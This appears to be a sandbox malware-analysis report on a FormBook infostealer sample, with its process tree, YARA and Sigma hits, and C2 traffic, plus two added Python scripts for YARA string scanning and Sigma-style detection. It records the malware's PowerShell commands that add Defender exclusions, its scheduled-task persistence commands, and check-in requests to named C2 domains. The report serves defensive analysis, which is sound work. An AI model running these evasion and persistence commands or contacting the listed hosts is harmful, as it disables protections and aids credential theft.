
Windows Analysis Report
jlsvOH1c8bSRKqM.exe

Overview

General Information

Sample name: jlsvOH1c8bSRKqM.exe
Analysis ID: 1468932
MD5: 5cb7acef6fcb2f9feed94483f364030a
SHA1: 68470b83c29c96c569ed5db44668fe6286c1230c
SHA256: c6af34274ba09e990bdbc008c74f95f935ba6d256ed23ee8c67ea06530c8c0ea
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • jlsvOH1c8bSRKqM.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe" MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
    • powershell.exe (PID: 7452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7532 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jlsvOH1c8bSRKqM.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe" MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
      • DAGiwzvTYsMjq.exe (PID: 4956 cmdline: "C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • reg.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\reg.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • DAGiwzvTYsMjq.exe (PID: 5764 cmdline: "C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6488 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • AZJifQrhDpEQCA.exe (PID: 7752 cmdline: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
    • schtasks.exe (PID: 7976 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AZJifQrhDpEQCA.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe" MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
    • AZJifQrhDpEQCA.exe (PID: 8028 cmdline: "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe" MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
    • AZJifQrhDpEQCA.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe" MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
      • DAGiwzvTYsMjq.exe (PID: 6008 cmdline: "C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • reg.exe (PID: 5216 cmdline: "C:\Windows\SysWOW64\reg.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings (memory dumps)
Source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2adc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x38086:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x21605:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
(19 further memory-dump entries in the full report)

Source | Rule | Description | Author | Strings (unpacked PEs)
Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2d533:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16ab2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2e333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x178b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
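The two hex strings above are the only parts of Windows_Trojan_Formbook_1112e116 the report prints; the real rule carries more strings and a condition. As an added example (not code from Joe Sandbox or from the rule's authors), the scanner below re-creates just those two strings and reports where they land in a buffer, so the offsets can be compared with the ones listed for the unpacked PE. The sample buffer is constructed here: filler with the two strings planted at the offsets the 8.2 unpack entry reports.

```python
import re

# The two hex strings the report attributes to Windows_Trojan_Formbook_1112e116.
FORMBOOK_STRINGS = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}


def hex_string_to_bytes(s):
    """Turn a YARA-style spaced hex string into raw bytes."""
    return bytes.fromhex(s.replace(" ", ""))


PATTERNS = {name: hex_string_to_bytes(h) for name, h in FORMBOOK_STRINGS.items()}


def scan(buf):
    """Return {string_name: [offsets]} for every occurrence of each pattern in buf."""
    hits = {}
    for name, pat in PATTERNS.items():
        offsets = [m.start() for m in re.finditer(re.escape(pat), buf)]
        if offsets:
            hits[name] = offsets
    return hits


def matches(buf):
    """Mimic an 'all listed strings present' condition (the real rule's condition is not shown in the report)."""
    return set(scan(buf)) == set(PATTERNS)


def scan_file(path):
    """Scan a file on disk (e.g. a dumped unpacked PE) with the same patterns."""
    with open(path, "rb") as f:
        return scan(f.read())


def build_sample(offset_a2, offset_a3, size=0x40000):
    """Constructed test buffer: uniform filler with the two strings planted at known offsets."""
    buf = bytearray(b"\x90" * size)
    buf[offset_a2:offset_a2 + len(PATTERNS["$a2"])] = PATTERNS["$a2"]
    buf[offset_a3:offset_a3 + len(PATTERNS["$a3"])] = PATTERNS["$a3"]
    return bytes(buf)


if __name__ == "__main__":
    # Offsets copied from the 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack entry above.
    sample = build_sample(0x2D533, 0x16AB2)
    for name, offsets in sorted(scan(sample).items()):
        print(name, [hex(o) for o in offsets])
    print("all strings present:", matches(sample))
```

Note that the offsets differ between the memory dumps and the unpacked PE entries in the report because each dump starts at a different base; the byte sequences are identical, which is why a plain substring search is enough to reproduce the hits.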

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ParentImage: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe, ParentProcessId: 7268, ParentProcessName: jlsvOH1c8bSRKqM.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ProcessId: 7452, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe, ParentImage: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe, ParentProcessId: 7752, ParentProcessName: AZJifQrhDpEQCA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp", ProcessId: 7976, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ParentImage: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe, ParentProcessId: 7268, ParentProcessName: jlsvOH1c8bSRKqM.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", ProcessId: 7532, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ParentImage: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe, ParentProcessId: 7268, ParentProcessName: jlsvOH1c8bSRKqM.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ProcessId: 7452, ProcessName: powershell.exe

            Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ParentImage: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe, ParentProcessId: 7268, ParentProcessName: jlsvOH1c8bSRKqM.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", ProcessId: 7532, ProcessName: schtasks.exe
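The Sigma matches in the System Summary and Persistence sections all key on the same three facts from the process tree: powershell.exe adding a Defender exclusion, schtasks.exe creating a task from an XML file in the user's Temp directory, and schtasks.exe being launched by an executable in a user-writable path. As an added example (not Joe Sandbox's code and not the Sigma rules themselves, which carry more selections and exclusions), the script below runs simplified versions of those three checks over constructed process-creation records whose command lines and parents are copied from the process tree above; the final record is a constructed benign control.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688
# style). Command lines and parent images are copied from the report's process
# tree; the last record is a constructed benign control that must not fire.
EVENTS = [
    {"pid": 7452,
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"',
     "parent": r"C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"},
    {"pid": 7504,
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"',
     "parent": r"C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"},
    {"pid": 7532,
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"',
     "parent": r"C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"},
    {"pid": 7976,
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp"',
     "parent": r"C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"},
    {"pid": 9001,  # constructed benign control: a task query launched by the shell
     "cmd": r'schtasks /Query /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start"',
     "parent": r"C:\Windows\explorer.exe"},
]

# Simplified re-creations of the three rule ideas the report lists.
DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)\b", re.I)
SCHTASKS_CREATE = re.compile(r'schtasks(\.exe)?"?\s+/create\b', re.I)
TEMP_XML = re.compile(r'/xml\s+"?[^"\s]*\\temp\\', re.I)          # /XML pointing into ...\Temp\
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(appdata|desktop|downloads|documents|public)\\", re.I)

RULES = {
    "PowerShell Defender exclusion":
        lambda e: DEFENDER_EXCLUSION.search(e["cmd"]) is not None,
    "Scheduled task from temp XML":
        lambda e: SCHTASKS_CREATE.search(e["cmd"]) is not None and TEMP_XML.search(e["cmd"]) is not None,
    "Schtasks parent in user-writable path":
        lambda e: SCHTASKS_CREATE.search(e["cmd"]) is not None and USER_WRITABLE.match(e["parent"]) is not None,
}


def alerts_for(event):
    """Names of the rules that fire on one process-creation record."""
    return [name for name, check in RULES.items() if check(event)]


def evaluate(events):
    """Run every rule over every record; returns a list of (rule, pid) pairs."""
    return [(name, e["pid"]) for e in events for name in alerts_for(e)]


if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{pid}: {rule}")
```

Two caveats when moving this onto real telemetry: the report's Image field reads SysWOW64\...\powershell.exe although the command line says System32, because the 32-bit parent is subject to file-system redirection, so match on the process name rather than the full path; and Add-MpPreference here is run in the clear, whereas the "Base64 Encoded MpPreference Cmdlet" rule exists precisely because the same cmdlet is often passed through -EncodedCommand, which a plain substring check on the command line will miss.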
Timestamp: 07/08/24-09:33:28.821901
SID: 2855465
Source Port: 49741
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


            AV Detection

Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Virustotal: Detection: 31%
Source: jlsvOH1c8bSRKqM.exe; ReversingLabs: Detection: 34%
Source: jlsvOH1c8bSRKqM.exe; Virustotal: Detection: 31%
Source: Yara match; File source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Joe Sandbox ML: detected
Source: jlsvOH1c8bSRKqM.exe; Joe Sandbox ML: detected
Source: jlsvOH1c8bSRKqM.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: jlsvOH1c8bSRKqM.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ZxNe.pdb source: jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DAGiwzvTYsMjq.exe, 00000010.00000000.1786583208.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128994331.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4128729232.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1861195873.0000000003182000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1863498773.0000000003371000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.000000000317E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1962025631.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1960067886.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: jlsvOH1c8bSRKqM.exe, jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, reg.exe, reg.exe, 00000011.00000003.1861195873.0000000003182000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1863498773.0000000003371000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.000000000317E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1962025631.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1960067886.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: reg.pdb source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.0000000001248000.00000004.00000020.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 0000000F.00000002.1960190592.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000003.1799312024.0000000000FDB000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000002.4128948551.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000003.1898624994.0000000000B5B000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128613079.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: reg.pdbGCTL source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.0000000001248000.00000004.00000020.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 0000000F.00000002.1960190592.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000003.1799312024.0000000000FDB000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000002.4128948551.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000003.1898624994.0000000000B5B000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128613079.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ZxNe.pdbSHA256+ source: jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.dr
Source: C:\Windows\SysWOW64\reg.exe; Code function: 17_2_02CEC070 FindFirstFileW,FindNextFileW,FindClose, 17_2_02CEC070
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 4x nop then jmp 0706135Ch, 0_2_070614DA
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Code function: 4x nop then jmp 070F0554h, 9_2_070F06D2
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Code function: 4x nop then jmp 070F0554h, 9_2_070F0828
Source: C:\Windows\SysWOW64\reg.exe; Code function: 4x nop then xor eax, eax, 17_2_02CD9780
Source: C:\Windows\SysWOW64\reg.exe; Code function: 4x nop then pop edi, 17_2_02CE259D
Source: C:\Windows\SysWOW64\reg.exe; Code function: 4x nop then mov ebx, 00000004h, 17_2_03420548

            Networking

Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49741 -> 3.33.130.190:80
Source: DNS query: www.soutsour.xyz
Source: Joe Sandbox View; IP Address: 199.59.243.226
Source: Joe Sandbox View; IP Address: 203.161.41.207
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 occurrences)
Source: global traffic; HTTP traffic detected: GET /8vcs/?QdC=AFMh5N&gNl=S5368XARNWnsRPU79+engpq5FH91z/VvzYo3ppZunCrDl85kGpMYYQZ3LKQ1c9Pzm3jcz7UCsoRBkqoouNpmJgjgkplBk0Qbj7O+44Ma0M/QxRY+rJ4fr5w= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.angrytee.com | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /v6z4/?gNl=v5OlzSyVHRQHkR8SzJ3gVKTFGeiNQ9a3rPHOxN5wltqCxit6zhqg4pXFuWsKngfZsZtYBOZhxp3bwCRN51e7LBPhb0MuJX9gMhQmuGphOmN3xULrqSpMXE0=&QdC=AFMh5N HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.orthonow.live | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
